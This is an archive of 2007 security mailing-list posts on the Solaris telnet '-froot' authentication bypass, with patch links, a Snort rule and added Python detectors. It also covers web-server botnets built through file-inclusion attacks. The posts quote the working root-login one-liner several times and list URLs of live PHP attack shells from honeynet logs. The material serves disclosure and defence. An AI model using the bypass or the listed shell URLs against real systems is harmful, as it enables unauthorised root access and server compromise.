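The `telnet -l "-froot"` trick quoted in the exchange above travels to the server inside a telnet NEW-ENVIRON suboption, where the client answers the server's SEND with IS VAR "USER" VALUE "-froot"; those are the bytes behind the `|ff fa 27 00 00 55 53 45 52 01 2d 66|` content match in the Bleeding Edge signature quoted in the solutions digest later on this page. The added example below is not from the thread, from Bleeding Edge or from Sun: it decodes NEW-ENVIRON suboptions (RFC 1572 encoding, including ESC and doubled-IAC escaping) from a captured client byte stream and flags USER values that start with "-", the shape that reaches login as an option. The `client_environ` helper constructs the client side of the exchange for testing and is an assumption about one reasonable client's output, not a capture.

```python
IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEW_ENVIRON = 0x27                  # telnet option 39 (RFC 1572)
IS, SEND, INFO = 0, 1, 2            # suboption commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

def suboptions(stream):
    """Yield (option, payload) for every IAC SB ... IAC SE in a byte stream,
    un-doubling escaped 0xFF bytes inside the payload."""
    i, n = 0, len(stream)
    while i + 2 < n:
        if stream[i] == IAC and stream[i + 1] == SB:
            opt, j, payload = stream[i + 2], i + 3, bytearray()
            while j < n:
                b = stream[j]
                if b == IAC and j + 1 < n and stream[j + 1] == IAC:
                    payload.append(IAC); j += 2; continue
                if b == IAC and j + 1 < n and stream[j + 1] == SE:
                    j += 2; break
                payload.append(b); j += 1
            yield opt, bytes(payload)
            i = j
        else:
            i += 1

def parse_new_environ(payload):
    """Decode an IS/INFO payload into [(kind, name, value)], kind being 'VAR'
    or 'USERVAR'. ESC escapes the byte that follows it."""
    if not payload or payload[0] not in (IS, INFO):
        return []
    out, kind, name, value, field = [], None, None, None, None
    def flush():
        if kind is not None:
            out.append((kind, bytes(name).decode("latin-1"), bytes(value).decode("latin-1")))
    i = 1
    while i < len(payload):
        b = payload[i]
        if b in (VAR, USERVAR):
            flush()
            kind = "VAR" if b == VAR else "USERVAR"
            name, value = bytearray(), bytearray()
            field = name
        elif b == VALUE and kind is not None:
            field = value
        elif b == ESC and i + 1 < len(payload):
            i += 1
            if field is not None:
                field.append(payload[i])
        elif field is not None:
            field.append(b)
        i += 1
    flush()
    return out

def dash_user_values(stream):
    """USER values beginning with '-' found in NEW-ENVIRON suboptions: the
    shape that in.telnetd hands to login as an option (-f = pre-authenticated)."""
    hits = []
    for opt, payload in suboptions(stream):
        if opt == NEW_ENVIRON:
            for kind, name, value in parse_new_environ(payload):
                if name == "USER" and value.startswith("-"):
                    hits.append(value)
    return hits

def _escape(data):
    out = bytearray()
    for b in data:
        if b in (VAR, VALUE, ESC, USERVAR):
            out.append(ESC)             # RFC 1572 escaping of separator bytes
        if b == IAC:
            out.append(IAC)             # IAC is doubled inside a suboption
        out.append(b)
    return bytes(out)

def client_environ(user):
    """Constructed: the IS reply a client sends for USER after the server's SEND."""
    body = bytes([IS, VAR]) + b"USER" + bytes([VALUE]) + _escape(user.encode("latin-1"))
    return bytes([IAC, SB, NEW_ENVIRON]) + body + bytes([IAC, SE])

SIGNATURE = bytes.fromhex("ff fa 27 00 00 55 53 45 52 01 2d 66")   # Bleeding Edge content match

if __name__ == "__main__":
    wire = client_environ("-froot")
    print(wire.hex(), "matches signature:", SIGNATURE in wire, "flagged:", dash_user_values(wire))
```

Note that the Bleeding Edge rule only matches "-f" directly after VALUE; this decoder also sees a USER value that is ESC-escaped or preceded by other variables, which a fixed byte pattern does not.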


defacements for the installation of malcode

2007-02-14 Thread Gadi Evron
Websense just released a blog post on how sites get defaced for malicious
purposes other than the defacement itself, such as installing malicious
software on visiting users.

This is yet another layer of abuse of web server attack platforms.

You can find their post here:
http://www.websense.com/securitylabs/blog/blog.php?BlogID=109

Gadi.



Solaris telnet vuln solutions digest and network risks

2007-02-14 Thread Gadi Evron
A couple of updates and a summary digest of useful information shared from
all around on this vulnerability, for those of us trying to make sense of
what it means to our networks:

1. Sun released a patch (although it is not a final one). It can be found
on their site ( http://sunsolve.sun.com/tpatches - thanks to Casper Dik of
Sun, for those who have been following the discussion).

To quote: "the simplest possible fix on such short notice":
http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923

2. If you haven't already, I strongly recommend checking your network for
machines running telnet, and more specifically, vulnerable to this
particular issue.

Several folks are speaking of third-party appliances running on Solaris,
as well as some back-end VoIP devices that have been confirmed as
vulnerable.

Apparently, telnet returns a different answer when this vulnerability is
used. We are not sure yet, but Noam Rathaus brought up the option that it
looks like the client responds with a "Won't Authentication Option" to the
server's "Do Authentication Option". This could perhaps be used to
actively detect the "attack".

3. If this solution is viable for you and you haven't already, ACLing
23/tcp at the border or from your user space may not be a bad idea, if it
won't kill anything. At least for now.

4. Bleeding Edge (ex Bleeding Snort) released snort signatures for this:
http://www.bleedingthreats.net/index.php/2007/02/12/solaris-remote-telnet-root-exploit-signature/

Quoting:

Chris Byrd has submitted an accurate signature for the exploit.
# Submitted 2007-02-12 by Chris Byrd
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:"BLEEDING-EDGE EXPLOIT Solaris telnet USER environment vuln"; flow:to_server,established; content:"|ff fa 27 00 00 55 53 45 52 01 2d 66|"; rawbytes; classtype:attempted-user; reference:url,riosec.com/solaris-telnet-0-day; sid:2003411; rev:1;)


5. An analysis of how this vulnerability works can be found here:
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

And blogs by Sun on how this happened and was fixed (thanks to Georg
Oppenberg):
http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit
http://blogs.sun.com/danmcd/entry/how_opensolaris_did_its_job

And a fine explanation by Casper Dik on Bugtraq:
http://seclists.org/bugtraq/2007/Feb/0205.html

6. Apparently, this is the same vulnerability in 'login' that was in AIX
in 1994:
http://www.cert.org/advisories/CA-1994-09.html
http://osvdb.org/displayvuln.php?osvdb_id=1007

7. Vulnerable systems: reports are unclear, some or all of Solaris 10. No
earlier versions of Solaris/SunOS are vulnerable.

8. Other workarounds exist. Brad Powell suggested on Full-Disclosure:

Quoting:

For root login; there is a setting in /etc/default/login. If CONSOLE is
set, then root can only login on that device
i.e. "CONSOLE=/dev/ttya" means "root" can only login on ttya device. Any
other user via telnet/ssh/whatever has to login as themselves and "su" to
root.

This doesn't prevent telnet -l "-fbin", or -flp; for those accounts best
bet is to change /etc/passwd for the shell of system-account users to
/sbin/noshell or /bin/false (noshell just logs the entry and exits)

Of course disabling in.telnetd in /etc/inetd.conf (and doing a pkill -HUP
inetd) if possible is a safe bet,
but some sites are forced to use telnetd. 


Background:

The original post on this, with the "exploit", can be found here:
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

A bit of background:
http://blogs.securiteam.com/index.php/archives/814

And some on how corporations responded as we saw from our own client base:
http://blogs.securiteam.com/index.php/archives/819

Opinion:

Whatever my thoughts are on how silly, sad or funny this vulnerability is
(quaint really), how they use telnet (?!) and how Sun should be smacked on
the back of the head for it, I have to honestly admit Sun's response and
the level they were open to the community and industry on this without
too many PR/legal blocks getting in their way are very encouraging,
releasing information on the vulnerability, how it happened and why, a
quick beta patch and even discussing openly on mailing lists.
I am in awe. Now it is time for others to follow their example.

This one, despite its simplicity and age, is going to be with us for a
while.

Gadi Evron.
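
What the Bleeding Edge content match (item 4 above) is actually looking at, as an added example in Python; this is not code from Sun, from the digest's contributors or from the Bleeding Edge rule. It parses the telnet NEW-ENVIRON suboption a client uses to send USER and flags any USER value that begins with '-'. Byte constants are from RFC 854/855 and RFC 1572; the two client streams at the bottom are constructed for the demonstration, not captures.

```python
"""Detect the telnet USER-environment trick behind the Solaris in.telnetd
issue by parsing NEW-ENVIRON suboptions from a client-to-server byte stream.

Added example for the digest above, not code from Sun, from the digest's
contributors or from the Bleeding Edge rule. Byte constants are from
RFC 854/855 (IAC, SB, SE, WILL/WONT/DO/DONT) and RFC 1572 (NEW-ENVIRON,
option 39: IS, SEND, INFO, VAR, VALUE, ESC, USERVAR). The client streams
at the bottom are constructed for the demonstration, not captures.
"""

IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
NEW_ENVIRON = 0x27                       # telnet option 39
ENV_IS, ENV_SEND, ENV_INFO = 0, 1, 2     # NEW-ENVIRON subcommands
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3

# The content match of the Bleeding Edge rule: IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f"
SNORT_CONTENT = bytes.fromhex('ff fa 27 00 00 55 53 45 52 01 2d 66')


def iter_suboptions(stream):
    """Yield (option, payload) for each IAC SB <option> ... IAC SE in the stream.

    A doubled IAC inside a suboption is the escape for a literal 0xFF and is
    collapsed to one byte; two-byte IAC commands and three-byte option
    negotiations found between suboptions are skipped.
    """
    i, n = 0, len(stream)
    while i < n:
        if stream[i] != IAC or i + 1 >= n:
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd in (WILL, WONT, DO, DONT):
            i += 3
            continue
        if cmd != SB:
            i += 2
            continue
        if i + 2 >= n:
            break
        option, payload, j = stream[i + 2], bytearray(), i + 3
        while j < n:
            b = stream[j]
            if b != IAC:
                payload.append(b)
                j += 1
            elif j + 1 < n and stream[j + 1] == IAC:
                payload.append(IAC)          # escaped literal 0xFF
                j += 2
            else:                            # IAC SE ends the suboption (any other IAC is malformed and also ends it)
                j += 2
                break
        yield option, bytes(payload)
        i = j


def parse_new_environ(payload):
    """Decode an IS/INFO NEW-ENVIRON payload into [(kind, name, value), ...].

    kind is 'VAR' (well-known variable such as USER) or 'USERVAR'. ESC quotes
    the following byte so that VAR/VALUE/ESC/USERVAR can appear literally in a
    name or value. SEND (server to client) and empty payloads give [].
    """
    if not payload or payload[0] not in (ENV_IS, ENV_INFO):
        return []
    entries, kind, name, value, field = [], None, None, None, None
    i = 1
    while i < len(payload):
        b = payload[i]
        if b in (ENV_VAR, ENV_USERVAR):
            if kind is not None:
                entries.append((kind, bytes(name), bytes(value)))
            kind = 'VAR' if b == ENV_VAR else 'USERVAR'
            name, value = bytearray(), bytearray()
            field = name
        elif b == ENV_VALUE and kind is not None:
            field = value
        elif b == ENV_ESC:
            i += 1                           # the escaped byte goes in literally
            if i < len(payload) and field is not None:
                field.append(payload[i])
        elif field is not None:
            field.append(b)
        i += 1
    if kind is not None:
        entries.append((kind, bytes(name), bytes(value)))
    return entries


def find_dash_user(stream):
    """Return every USER value in the stream's NEW-ENVIRON replies that starts with '-'.

    in.telnetd handed the client-supplied USER value on to login, where a
    leading "-f" is read as login's pre-authenticated flag. Any leading '-' is
    flagged here regardless of the option letter, in both VAR and USERVAR form.
    """
    hits = []
    for option, payload in iter_suboptions(stream):
        if option == NEW_ENVIRON:
            for _kind, name, value in parse_new_environ(payload):
                if name == b'USER' and value.startswith(b'-'):
                    hits.append(value.decode('latin-1'))
    return hits


# Constructed sample streams, not captures: a normal login and the "-fbin" one.
BENIGN = (bytes([IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, ENV_IS, ENV_VAR])
          + b'USER' + bytes([ENV_VALUE]) + b'alice' + bytes([IAC, SE]))
MALICIOUS = (bytes([IAC, SB, NEW_ENVIRON, ENV_IS, ENV_VAR]) + b'USER'
             + bytes([ENV_VALUE]) + b'-fbin' + bytes([ENV_VAR]) + b'DISPLAY'
             + bytes([ENV_VALUE]) + b'x:0' + bytes([IAC, SE]))

if __name__ == '__main__':
    print('benign   :', find_dash_user(BENIGN))
    print('malicious:', find_dash_user(MALICIOUS))
    print('snort content present:', SNORT_CONTENT in MALICIOUS)
```

The Snort content is a single contiguous match, so it fires only when USER is the first variable after IS, sent as VAR, and the value starts with exactly "-f". The parser above also catches USER sent after other variables, as a USERVAR, with another option letter, or with an IAC IAC escape somewhere in the suboption, all of which a byte-string match walks past.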




Re: Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Gadi Evron
On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> 
> >Yeah, a backdoor is a remote possibility. But it's also an arbitrary and
> >needlessly complex one. Maybe it's a nefarious plot by our UFO-appointed
> >shadow government, but chances are, it's not (they have better things to
> >do today).
> 
> And one which was too easy to discover; real back doors are better
> masqueraded as buffer overflows you might not chance upon.

We all agree it is not a very likely possibility, but I wouldn't rule it
out completely just yet until more information from Sun becomes
available.

There are a lot more relevant issues to discuss here regarding this
vulnerability, however, and we can move on from that moot point for now.

Thanks for your help and Sun's, Casper, but we would all like more
information.

> Casper
> 

Gadi.



Re: Solaris telnet vulnberability - how many on your network?

2007-02-13 Thread Gadi Evron
On Tue, 13 Feb 2007, Gadi Evron wrote:
> On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> > 
> > >On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> > >> 
> > >> >
> > >> >Am I missing something?  This vulnerability is close to 10 years old.
> > >> >It was in one of the first versions of Solaris after Sun moved off of
> > >> >the SunOS BSD platform and over to SysV.  It has specifically to do
> > >> >with how arguments are processed via getopt() if I recall correctly.
> > >> 
> > >> You're confused with AIX/Linux
> > >> 
> > >> Solaris did not have the -f option in login until much later.
> > >
> > >Hi Casper. While we have you here, any idea on when Sun will be patching
> > >this issue?
> > 
> > Now, follow the links from http://sunsolve.sun.com/tpatches
> > 
> > Casper
> > 
> 
> Many thanks Casper! Can you give some more information on exactly what is
> patched. Any Sun released advisory?

Specifically, more than:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1&searchclause=%22category:security%22%2420%22availability,%2420security%22%2420category:security

Because of the wide implications of this particular issue?

Also, any idea on how this vulnerability was introduced?

Thanks again,

Gadi.



Re: Solaris telnet vulnberability - how many on your network?

2007-02-13 Thread Gadi Evron
On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> 
> >On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> >> 
> >> >
> >> >Am I missing something?  This vulnerability is close to 10 years old.
> >> >It was in one of the first versions of Solaris after Sun moved off of
> >> >the SunOS BSD platform and over to SysV.  It has specifically to do
> >> >with how arguments are processed via getopt() if I recall correctly.
> >> 
> >> You're confused with AIX/Linux
> >> 
> >> Solaris did not have the -f option in login until much later.
> >
> >Hi Casper. While we have you here, any idea on when Sun will be patching
> >this issue?
> 
> Now, follow the links from http://sunsolve.sun.com/tpatches
> 
> Casper
> 

Many thanks Casper! Can you give some more information on exactly what is
patched. Any Sun released advisory?

Thanks again,

Gadi.



Re: Solaris telnet vulnberability - how many on your network?

2007-02-13 Thread Gadi Evron
On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
> 
> >
> >Am I missing something?  This vulnerability is close to 10 years old.
> >It was in one of the first versions of Solaris after Sun moved off of
> >the SunOS BSD platform and over to SysV.  It has specifically to do
> >with how arguments are processed via getopt() if I recall correctly.
> 
> You're confused with AIX/Linux
> 
> Solaris did not have the -f option in login until much later.

Hi Casper. While we have you here, any idea on when Sun will be patching
this issue?

Many thanks,

Gadi.



RE: Solaris telnet vulnberability - how many on your network?

2007-02-13 Thread Gadi Evron
On Tue, 13 Feb 2007, Oliver Friedrichs wrote:
> 
> Gadi,
> 
> It looks like I was confused, this actually affected AIX and Linux in
> 1994:
> 
> http://www.securityfocus.com/bid/458/info
> http://www.cert.org/advisories/CA-1994-09.html

Same same but with rlogin, as someone mentioned on DSHIELD.

Gadi.

> 
> Oliver
> 
> -----Original Message-
> From: Gadi Evron [mailto:[EMAIL PROTECTED] 
> Sent: Tuesday, February 13, 2007 1:46 AM
> To: Oliver Friedrichs
> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
> Subject: RE: Solaris telnet vulnberability - how many on your network?
> 
> On Mon, 12 Feb 2007, Oliver Friedrichs wrote:
> > 
> > Am I missing something?  This vulnerability is close to 10 years old.
> > It was in one of the first versions of Solaris after Sun moved off of 
> > the SunOS BSD platform and over to SysV.  It has specifically to do 
> > with how arguments are processed via getopt() if I recall correctly.
> 
> Hey Oliver! :)
> 
> Well then, I guess it just became new again. And to be honest, I have to
> agree with a previous poster and suspect (only suspect) it could somehow
> be a backdoor rather than a bug.
> 
> The reason why this vulnerability is so critical is the number of
> networks and organizations which rely on Solaris for critical production
> servers, as well as use telnet for internal communication on their LAN
> (now how smart is that? I'd rather use telnet on the Internet than on a
> local LAN).
> 
> Further, there are quite a few third party appliances (some
> infrastructure back-end) that can not easily be patched running on
> Solaris (forget fuzzing or VA, people never even NMAP appliances they
> buy).
> 
> I am unsure of how long we will see this in to-do items of corporate
> security teams around the world, but I am sure Sun's /8 is getting a lot
> of action recently.
> 
> > 
> > Oliver
> 
>   Gadi.
> 
> > 
> > -Original Message-
> > From: Gadi Evron [mailto:[EMAIL PROTECTED]
> > Sent: Sunday, February 11, 2007 10:01 PM
> > To: bugtraq@securityfocus.com
> > Cc: full-disclosure@lists.grok.org.uk
> > Subject: Solaris telnet vulnberability - how many on your network?
> > 
> > Johannes Ullrich from the SANS ISC sent this to me and then I saw it 
> > on the DSHIELD list:
> > 
> > 
> > If you run Solaris, please check if you got telnet enabled NOW. If you
> > can, block port 23 at your perimeter. There is a fairly trivial
> > Solaris telnet 0-day.
> > 
> > telnet -l "-froot" [hostname]
> > 
> > will give you root on many Solaris systems with default installs
> > We are still testing. Please use our contact form at
> > https://isc.sans.org/contact.html
> > if you have any details about the use of this exploit.
> > 
> > 
> > You mean they still use telnet?!
> > 
> > Update from HD Moore:
> > "but this bug isnt -froot, its -fanythingbutroot =P"
> > 
> > On the exploits@ mailing list and on DSHIELD this vulnerability was 
> > verified as real.
> > 
> > If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a
> > strong suggestion.
> > 
> > Anyone else running Solaris?
> > 
> > Gadi.
> > 
> > 
> 
> 



RE: Solaris telnet vulnberability - how many on your network?

2007-02-13 Thread Gadi Evron
On Mon, 12 Feb 2007, Oliver Friedrichs wrote:
> 
> Am I missing something?  This vulnerability is close to 10 years old.
> It was in one of the first versions of Solaris after Sun moved off of
> the SunOS BSD platform and over to SysV.  It has specifically to do with
> how arguments are processed via getopt() if I recall correctly.

Hey Oliver! :)

Well then, I guess it just became new again. And to be honest, I have to
agree with a previous poster and suspect (only suspect) it could somehow
be a backdoor rather than a bug.

The reason why this vulnerability is so critical is the number of networks
and organizations which rely on Solaris for critical production servers,
as well as use telnet for internal communication on their LAN (now how
smart is that? I'd rather use telnet on the Internet than on a local LAN).

Further, there are quite a few third party appliances (some
infrastructure back-end) that can not easily be patched running on
Solaris (forget fuzzing or VA, people never even NMAP appliances they
buy).

I am unsure of how long we will see this in to-do items of corporate
security teams around the world, but I am sure Sun's /8 is getting a lot
of action recently.

> 
> Oliver 

Gadi.

> 
> -----Original Message-
> From: Gadi Evron [mailto:[EMAIL PROTECTED] 
> Sent: Sunday, February 11, 2007 10:01 PM
> To: bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Solaris telnet vulnberability - how many on your network?
> 
> Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
> the DSHIELD list:
> 
> 
> If you run Solaris, please check if you got telnet enabled NOW. If
> you
> can, block port 23 at your perimeter. There is a fairly trivial
> Solaris telnet 0-day.
> 
> telnet -l "-froot" [hostname]
> 
> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
> https://isc.sans.org/contact.html
> if you have any details about the use of this exploit.
> 
> 
> You mean they still use telnet?!
> 
> Update from HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"
> 
> On the exploits@ mailing list and on DSHIELD this vulnerability was
> verified as real.
> 
> If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a
> strong suggestion.
> 
> Anyone else running Solaris?
> 
>   Gadi.
> 
> 



Solaris telnet vulnberability - how many on your network?

2007-02-12 Thread Gadi Evron
Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
the DSHIELD list:


If you run Solaris, please check if you got telnet enabled NOW. If you
can, block port 23 at your perimeter. There is a fairly trivial
Solaris telnet 0-day.

telnet -l "-froot" [hostname]

will give you root on many Solaris systems with default installs
We are still testing. Please use our contact form at
https://isc.sans.org/contact.html
if you have any details about the use of this exploit.


You mean they still use telnet?!

Update from HD Moore:
"but this bug isnt -froot, its -fanythingbutroot =P"

On the exploits@ mailing list and on DSHIELD this vulnerability was
verified as real.

If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a
strong suggestion.

Anyone else running Solaris?

Gadi.



Web Server Botnets and Server Farms as Attack Platforms

2007-02-12 Thread Gadi Evron
Are file inclusion vulnerabilities equivalent to remote code
execution? Are servers (both Linux and Windows) now the lower hanging
fruit rather than desktop systems?

In the February edition of the Virus Bulletin magazine, we (Kfir
Damari, Noam Rathaus and Gadi Evron (me) of Beyond Security) wrote
an article on cross platform web server malware and their massive use as
botnets, spam bots and generally as attack platforms.

Web security papers deal mostly with secure coding and application
security. In this paper we describe how these are taken to the next level
with live attacks and operational problems service providers deal with
daily.

We discuss how these attacks work using (mainly) file inclusion
vulnerabilities (RFI) and (mainly) PHP shells.
Further, we discuss how ISPs and hosting farms suffer tremendously from
this, and what can be done to combat the threat.

I'd like to write more on this here, and ask for the community's feedback
on what others see in this field and how you deal with similar issues.

Malware is often built to operate within a certain OS environment. Web
server malware is completely cross-platform (as long as a web daemon which
supports scripting can be found such as IIS, Apache, etc.). These malware
attack the web application first, and only then further compromise takes
place platform by platform, using the web server's privileges.

Most web servers are being compromised by these attacks as a result of an
insecure web application written in PHP, although attacks for other
scripting languages such as Perl and ASP are also in-the-wild.

The main reason for this is that many different PHP applications are
available online, and often freely as open source, which makes them a
popular selection for use on many web sites. Another reason for the
popularity of attacks against PHP applications is that writing securely in
PHP is very difficult, which makes most of these PHP applications
vulnerable to multiple attacks, with hundreds of new vulnerabilities
released publicly every month.

While in the past botnets used to be composed of mainly broadband end
users running Windows, today we can see more and more server botnets we
can refer to as "IIS botnets" or "Linux botnets" as a direct result of
these attacks.

One of the conclusions we reached was that although the technologies used
are not new (RFI, PHP shells, etc.) the sheer scale of the problem is
what's interesting.

In our research as detailed in the Virus Bulletin article we recognize
that vulnerabilities such as file inclusion, as simple as they may be, are
equivalent to remote code execution in effect.

Although escalation wars, which are reactive in nature, are a solution we
hate and are stuck with on botnets, spam, fraud and many other fronts,
this front of web server attacks stands completely unopposed and
controlled by the bad guys. In our research we detail how over-time, when
aggregated, most attacks come from the same IP addresses without these
ever getting blocked.

ISPs and hosting farms selling low-cost hosting services can not cope with
this threat, especially where an attack against one user running such an
application can compromise a server running 3000 other sites.

Another issue discussed was the formation of the Web Honeynet Task Force
( http://www.webhoneynet.net/ renamed from the Web Honeynet Project to
avoid confusion with the honeynet project).

I write more about this and host the paper on my blog at SecuriTeam
( http://blogs.securiteam.com/index.php/archives/815 ). All
rights for the article itself belong to the Virus Bulletin magazine.

Gadi Evron.



Re: local Calendar System v1.1 (lcStdLib.inc) Remote File Include

2007-01-31 Thread Gadi Evron
On Mon, 29 Jan 2007, Simple Nomad wrote:
> On Mon, 2007-01-29 at 13:00 -0600, Gadi Evron wrote:
> > How can we all automate the testing process for fake vulns and list
> > them as such without overburdening OSVDB, CVE, Milworm and SecuriTeam?
> 
> How about letting them get posted to bugtraq as ppl test them out
> anyway? Usually the testing reports from various ppl on bugtraq bring up

They do get posted to bugtraq anyway. :)

> extra info such as "works on the previous version too" or "if foo=0 is
> in the config it doesn't work" etc, otherwise someone will want ALL
> versions tested before posting.
> 
> Bugtraq is probably about as automated as it gets, unless someone wants
> to send all their stuff to iDefense or TippingPoint who probably aren't
> going to touch the latest lame xss bug or php app bug.

Indeed, but for those of us trying to make some sense out of all this,
things are somewhat hazy. It is not about working hard or having more
work, it's about seeing if someone has any bright ideas on how to handle
this a bit better.

For example, remote file inclusion attacks are comparable to remote code
execution; testing each and every one of them is not always easy - but
something many of us do anyway.

Maybe it is time for a wiki/bugzilla sort of system to help get things run
more smoothly. Getting it running in this community won't be very easy
though.

You are right on the distribution..

> 
> -SN
> 



Re: local Calendar System v1.1 (lcStdLib.inc) Remote File Include

2007-01-29 Thread Gadi Evron
How can we all automate the testing process for fake vulns and list
them as such without overburdening OSVDB, CVE, Milworm and SecuriTeam?


On Sun, 28 Jan 2007, Stefano Zanero wrote:

> [EMAIL PROTECTED] wrote:
> 
> > local Calendar System v1.1 (lcStdLib.inc) Remote File Include
> 
> Fake vuln
> 
> > code :
> 
> The variables are set in config.php
> 
> > exploit:
> 
> You never tested them. Which is pretty lame.
> 
> Stefano
> 



Re: [Full-disclosure] Web Honeynet Project: announcement,

2007-01-12 Thread Gadi Evron
On Fri, 12 Jan 2007 [EMAIL PROTECTED] wrote:
> The Web Application Security Consortium is also doing such a project at
> http://www.webappsec.org/projects/honeypots/ . May be worthwhile to share 
> data perhaps?

My thoughts exactly!

Although... it is high time we started getting out of the mindset that web
security equals code security (application security), it doesn't.

Most of these application security issues are important, if not
very much so, but no matter how non-trivial they are, they are
completely solvable.

It's time to get rid of useless application firewalls, etc. and face the
music that there is currently a world of attacks we don't escalate
against and mostly do not know how to defend against on a large
scale. Take a look at zone-h if you need a reality check.

Most of the attacks described in my email are happening from the same IP
addresses, this is open relay days all over again, and it's time to wake
up and start the spam war.

Mitigate the threats by taking down bad sites, filter out bad URLs, filter
out attacking IP addresses, detect Linux and webserver malware,
etc.
Naturally, also remember the coding issues that caused it, and how we can
fix them. We should also not forget PHP and its contribution to this
mess.

Gadi.



Web Honeynet Project: announcement, exploit URLs this Wednesday

2007-01-12 Thread Gadi Evron
[ Warning: this email message includes links to live web server malware
propagated this Wednesday via file inclusions exploits. These links are
not safe! ]

Hello.

The newly formed Web Honeynet Project from SecuriTeam and the ISOTF will
in the next few months announce research on real-world web server attacks
which infect web servers with:
Tools, connect-back shells, bots, downloaders, malware, etc. which are all
cross-platform (for web servers) and currently exploited in the wild.

The Web Honeynet Project will, for now, not deal with the regular SQL
injection and XSS attacks every web security expert loves so much, but
just with malware and code execution attacks on web servers and hosting
farms.

These attacks form botnets constructed from web servers (mainly IIS and
Apache on Linux and Windows servers) and transform hosting farms/colos to
attack platforms.

Most of these "tools" are being injected by (mainly) file inclusion
attacks against (mainly) PHP web applications, as is well known and
established.

PHP (or scripting) shells, etc. have been known for a while, as well as
file inclusion (or RFI) attacks; however, mostly as something secondary,
and not much (if any - save for some blogs and a few mailing list posts a
year ago) attention was given to the subject other than to the
vulnerabilities themselves.

The bad guys currently exploit, create botnets and deface in a massive
fashion and force ISPs and colos to combat an impossible situation where
any (mainly) PHP application from any user can exploit entire server
farms, and where the web vulnerability serves as a remote exploit to be
followed by a local code execution one, or as a direct one.

What is new here is the scale, and the fact we now start engaging the bad
guys on this front (which so far, they have been unchallenged on) -
meaning that aside from research, the Web Honeynet Project will also
release actionable data on offensive IP addresses, URLs and on the tools
themselves to be made available to operational folks, so that they can
mitigate the threat.

It's long overdue that we start the escalation war with web server
attackers, much like we did with spam and botnets, etc. years ago. Several
folks (and quite loudly - me) have been warning about this for a while,
now it's time to take action instead of talk. :)

Note: Below you can find sample statistics on some of the Web Honeynet
Project information for this last Wednesday, on file inclusion attacks
seeding malware.
You will likely notice most of these have been taken care of by now.

The first research on the subject (after looking into several hundred such
tools) will be made public in the February edition of the Virus Bulletin
magazine, from:
Kfir Damari, Noam Rathaus and Gadi Evron (yours truly).

The SecuriTeam and ISOTF Web Honeynet Project would like to thank
Beyond Security ( http://www.beyondsecurity.com ) for all the support.

Special thanks (so far) to: Ryan Carter, Randy Vaughn and the rest of the
new members of the project.

For more information on the Web Honeynet Project feel free to contact me.

Also, thanks for yet others who helped me form this research and
operations hybrid project (you know who you are).

Gadi.

Sample report and statistics (for Wednesday the 10th of January, 2007):

IP | Hit Count | Malware (Count), ... |
195.225.130.118 | 12 | http://m embers.lycos.co.uk/onuhack/cmd1.do? (4), http://m embers.lycos.co.uk/onuhack/injek.txt? (6), http://m embers.lycos.co.uk/onuhack/cmd.do? (2),
69.93.147.242 | 11 | http://w ww.clubmusic.caucasus.net/administrator/cmd.gif? (1), http://c lubmusic.caucasus.net/administrator/cmd.gif? (4), http://w ww.ucanartists.org/components/com_extcalendar/cmd.gif? (5), http://t bchat.caucasus.net/cmd.gif? (1),
216.22.3.11 | 8 | http://h eidi.by.ru/cmdi.txt? (7), http://h eidiz.by.ru/cmdi.txt? (1),
62.149.36.116 | 8 | http://w ww.fc-magdeburg.de/jscripts/tiny_mce/plugins/pic.gif?? (3), http://w ww.discoverchimpanzees.org/blog/sendit.jpg?? (2), http://u bk.no-ip.biz/shine.jpg?? (1), http://w ww.sle.br/polvo2/script/ftv3doc.gif?? (1), http://w ww.sle.br/polvo2/css/css.gif?? (1),
85.25.148.178 | 7 | h ttp://213.133.108.122/alex.gif? (1), http://c lubmusic.caucasus.net/Administrator/cmd.gif? (5), http://w ww.ucanartists.org/components/com_extcalendar/cmd.gif? (1),
69.13.6.170 | 7 | http://c ajem.by.ru/cmd.gif? (3), http://k ama.opensolarisproject.com/phpBB2/files/cmd.gif? (1), http://s upsup.by.ru/cmd.gif? (2), http://w ww.bhlynx.org/htdig/sad.gif? (1),
201.63.179.122 | 7 | http://d arkhand.netfast.org/list.txt??? (2), http://w ww.locman.net/Guide/vkod/list.txt?? (3), http://g odarmy.net/cmd.txt?? (1), http://c hapolin.by.ru/cmds/list.txt? (1),
219.67.171.131 | 7 | http://i ntra/ (7),
193.39.119.174 | 6 | http://w ww.sirmet.it/pronti/cmd.txt?? (1), http://w ww.overclockers.pl/images/r57.gif? (1), http://w ww.rldiseno.com/administrator/components/com_remository/morgancmd.gif? (1), http://v irt
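
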